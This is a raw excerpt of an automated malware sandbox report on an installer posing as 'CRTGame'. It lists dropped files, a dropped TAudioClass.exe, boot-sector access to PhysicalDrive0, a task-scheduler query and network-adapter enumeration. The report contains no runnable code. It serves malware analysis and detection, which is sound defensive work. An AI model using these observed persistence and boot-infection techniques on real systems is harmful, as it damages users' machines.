Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\bassdsd.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-CKJ1G.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\bass_ofr.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-3DBAJ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-GSP1P.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Users\user\AppData\Local\Temp\is-V1CVR.tmp\_isetup\_RegDLL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\uchardet.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\libmp4v2.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\7z.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-1CHIA.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\libsox-3.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Users\user\AppData\Local\Temp\is-V1CVR.tmp\_isetup\_iscrypt.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-GRQ3N.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\libsoxr.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-MJ59N.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\bass_fx.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-O5QKP.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\bassflac.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\dsd2pcmt.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-C877S.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-VP35T.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-NJ7JN.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\libwebp.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-FBHLC.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\basswv.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\swresample-4.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-GUEH6.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\dstt.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-ITM21.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\crtgame.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-B8HMN.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\bass_aac.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-BA6TO.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\uninstall\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\libFLAC_dynamic.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-UG8V7.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\basscd.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\bass.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\bassalac.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\peak_scanner_plugin_c.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-P0GV3.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\OptimFROG.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\wavpackdll.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\tak_deco_lib.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\libdtsdec.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-6JHM7.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-83310.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\raw_decode_plugin_c.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\da.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\libwinpthread-1.dll (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exe	File created: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\bass_tta.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-JMEV2.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\gain_analysis.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-C9QMS.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\bassopus.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-DMP2Q.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-OMKRE.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-63DO2.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\sqlite3.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-GKK7D.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-EI0VO.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\opusenc.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\mp3gain.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-1KFVE.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\pcm2dsd.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\bassmix.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\ff_helper.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\utils.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\libvorbis.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-PBK8V.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-D14K1.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\bassape.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-EI90O.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-04UN3.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-OGODD.tmp	Jump to dropped file

Source: C:\Program Files (x86)\CRTGame\crtgame.exe

File created: C:\ProgramData\TAudioClass\TAudioClass.exe

Jump to dropped file

Boot Survival

Contains functionality to infect the boot sector

Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0		4_2_00401A58
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0		6_2_02C2F2AF

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /Query

Source: C:\Program Files (x86)\CRTGame\crtgame.exe

4_2_004026F0

Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	1_2_00423C1C
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	1_2_00423C1C
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_004241EC IsIconic,SetActiveWindow,SetFocus,	1_2_004241EC
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_004241A4 IsIconic,SetActiveWindow,	1_2_004241A4
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_00418394 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	1_2_00418394
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_0042286C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,	1_2_0042286C
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_004175A8 IsIconic,GetCapture,	1_2_004175A8
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_00417CDE IsIconic,SetWindowPos,	1_2_00417CDE
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_00417CE0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	1_2_00417CE0
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_00481CB0 IsIconic,GetWindowLongA,ShowWindow,ShowWindow,	1_2_00481CB0

Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp

Code function: 1_2_0044AEAC LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_0044AEAC

Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,		4_2_00401B54
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,		6_2_02C2F3B3

Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Window / User API: threadDelayed 765			Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Window / User API: threadDelayed 9194			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-FJDCA.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\daiso.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\uninstall\is-TGPT7.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\basswma.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-V1CVR.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-M7CIT.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassmidi.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-40N44.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\takdec.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-060C4.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-001GJ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\avfilter-9.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\lame_enc.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-DFCBR.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-JB8NH.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-EQ4MD.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-ISCOD.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-V1CVR.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\dsd2.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-KR7LG.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\d_writer.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-LTIA8.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-AT6AE.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-HI2BI.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-4LN2K.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-44UDD.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-V1CVR.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-L705K.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-HVEOK.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\avutil-58.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-J3HC1.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\sd.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-CA2OV.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\rg_ebur128.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassdsd.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-CKJ1G.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass_ofr.dll (copy)	Jump to dropped file
